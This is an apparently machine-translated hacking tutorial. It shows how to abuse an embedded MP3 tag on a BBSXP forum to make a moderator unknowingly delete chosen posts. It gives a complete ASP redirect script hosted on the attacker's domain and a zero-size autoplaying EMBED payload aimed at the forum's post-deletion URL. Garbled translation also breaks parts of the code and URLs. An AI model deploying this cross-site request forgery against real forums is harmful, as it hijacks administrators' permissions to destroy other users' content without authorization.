Ask authorized persons to help you delete the posts! MP3 cross-site

Mysterious little strong & 1943
We know that mature forum systems convert, filter, or delete sensitive HTML code when users submit post data, so that they cannot embed scripts to implement cross-site attacks. However, in mature forums, multimedia information can be submitted, that is, MP3 audio files or FLASH files can be embedded, today, we will discuss the cross-site attack of MP3. Take a certain version of BBSXP as an example to let the administrator or Banzhu help you uncertain delete any posts you want to delete (the condition is that he wants to view your post ):

First, find the link to delete the post: asp? ThreadID = 763703 & PostID = 1326482 "> http://bbs.yuzi.net/DelPost.asp? ThreadID = 763703 & PostID = 1326482
ThreadID is the topic number of the post, and PostID is the ID of the reply post in the topic. If PostID is omitted, the entire topic is deleted.

Next we will write an ASP file:
<JavaScript "%> % @ LANGUAGE =" JavaScript "%>
<Script language = "VBScript" RUNAT = "Server">
Function mySplit () // split the Parameter Function
MyArr = Split (music, "x ")
Id1 = myArr (0)
Id2 = myArr (1)
Id3 = myArr (2)
End Function
</Script>
<%
/*
Mp3 request link style: http://www.smxiaoqiang.cn/tools/music.asp? Mp3316763703x1326482xhellogirl.pdf
The red part is the request parameter, which contains the topic number and reply number, which are separated by the letter x. The purpose is that the forum system filters and cannot pass multiple parameters at the same time, therefore, we need to merge the parameters into a single parameter and re-split it in the background.
*/
Var music = Request. QueryString ("mp3"); // obtain the parameters passed by the MP3 Request link.
Var id1, id2, id3;
MySplit (); // split the passed parameters
Var myLink = "";
If (id3! = "Hellogirl.pdf "){
Response. write (""); // helloGirl is used to verify parameters and prevent unauthorized calls.
}
Else {
MyLink + = "ThreadID =" + id1;
If (id2! = "0") myLink + = "& PostID =" + id2; // If the sent PostID is 0, the whole topic is to be deleted, and the PostID is omitted.
MyLink = "http://bbs.yuzi.net/DelPost.asp? "+ MyLink; // construct the link for deleting the post
Response. redirect (myLink); // you can call the mp3 link to delete a post and delete the post.
// Response. End ();
}
%>

Now, the ASP function has been written and saved as music. asp. Then, upload the ASP file to your own domain name space for reference.
Then I went to the Forum to register an account, find an administrator the easiest to see the post reply, embedded in an MP3 file, address style for http://smxiaoqiang.cn/tools/music.asp? Mp310435077x0xhellogirl.pdf, set the length and width to 0, and set it to automatic playback. (If you want to delete multiple posts, You can embed multiple MP3 files)
The HTML or UBB Code is as follows:
<EMBED src = http://www.smxiaoqiang.cn/tools/music.asp? Mp31_35077x0xhellogirl1_width = 0 height = 0 AUTOSTART = "true" ShowStatusBar = "true">

In this way, as long as the person with relevant permissions views your reply, it will help you delete the post you want to delete.